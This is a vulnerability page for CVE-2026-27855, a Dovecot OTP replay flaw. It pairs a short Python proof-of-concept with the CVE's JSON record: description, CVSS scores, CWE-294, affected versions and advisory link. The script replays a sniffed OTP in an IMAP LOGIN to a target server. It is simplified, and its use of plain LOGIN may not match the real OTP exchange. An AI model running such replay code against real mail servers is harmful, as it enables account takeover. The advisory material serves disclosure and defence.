CVE-2026-27855

# Conceptual PoC for CVE-2026-27855 Dovecot OTP Replay # This script demonstrates how a captured OTP credential can be replayed # if the server is misconfigured with auth cache and username alteration. import socket # Configuration TARGET_HOST = '192.168.1.100' TARGET_PORT = 143 # IMAP port # Captured credentials from network sniffing # Attacker observed this exchange during a legitimate login CAPTURED_USER = '[email protected]' CAPTURED_OTP = '839201' # The valid OTP code used by the victim def replay_attack(): print(f"[*] Attempting to connect to {TARGET_HOST}:{TARGET_PORT}") try: # Establish connection to the Dovecot server s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) s.connect((TARGET_HOST, TARGET_PORT)) # Receive server banner banner = s.recv(1024).decode() print(f"[+] Server Banner: {banner.strip()}") # Attempt to authenticate using the replayed OTP # Note: Actual protocol implementation depends on specific IMAP/POP3 flow # This represents the payload injection of the captured OTP auth_payload = f"A001 LOGIN {CAPTURED_USER} {CAPTURED_OTP}\r\n" print(f"[*] Sending replayed payload: {auth_payload.strip()}") s.send(auth_payload.encode()) # Check response response = s.recv(1024).decode() print(f"[+] Server Response: {response.strip()}") if "OK" in response: print("[!] SUCCESS: Logged in using replayed OTP!") else: print("[-] FAILED: Server rejected the replayed OTP.") s.close() except Exception as e: print(f"[-] Error: {e}") if __name__ == "__main__": replay_attack()

{"cve": {"id": "CVE-2026-27855", "sourceIdentifier": "[email protected]", "published": "2026-03-27T09:16:19.610", "lastModified": "2026-04-29T19:23:00.583", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Dovecot OTP authentication is vulnerable to replay attack under specific conditions. If auth cache is enabled, and username is altered in passdb, then OTP credentials can be cached so that same OTP reply is valid. An attacker able to observe an OTP exchange is able to log in as the user. If authentication happens over unsecure connection, switch to SCRAM protocol. Alternatively ensure the communcations are secured, and if possible switch to OAUTH2 or SCRAM. No publicly available exploits are known."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:H/A:N", "baseScore": 6.8, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "HIGH", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "NONE"}, "exploitabilityScore": 1.6, "impactScore": 5.2}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:N", "baseScore": 5.9, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "HIGH", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.2, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-294"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:dovecot:dovecot:*:*:*:*:*:*:*:*", "versionEndExcluding": "2.4.3", "matchCriteriaId": "BE209329-C5EA-4EE7-A23E-CD2EC061A9A4"}, {"vulnerable": true, "criteria": "cpe:2.3:a:open-xchange:dovecot:*:*:*:*:pro:*:*:*", "versionEndIncluding": "2.3.0", "matchCriteriaId": "A02F1F2F-DD6E-4BE4-B785-AD002F05819B"}]}]}], "references": [{"url": "https://documentation.open-xchange.com/dovecot/security/advisories/csaf/2026/oxdc-adv-2026-0001.json", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}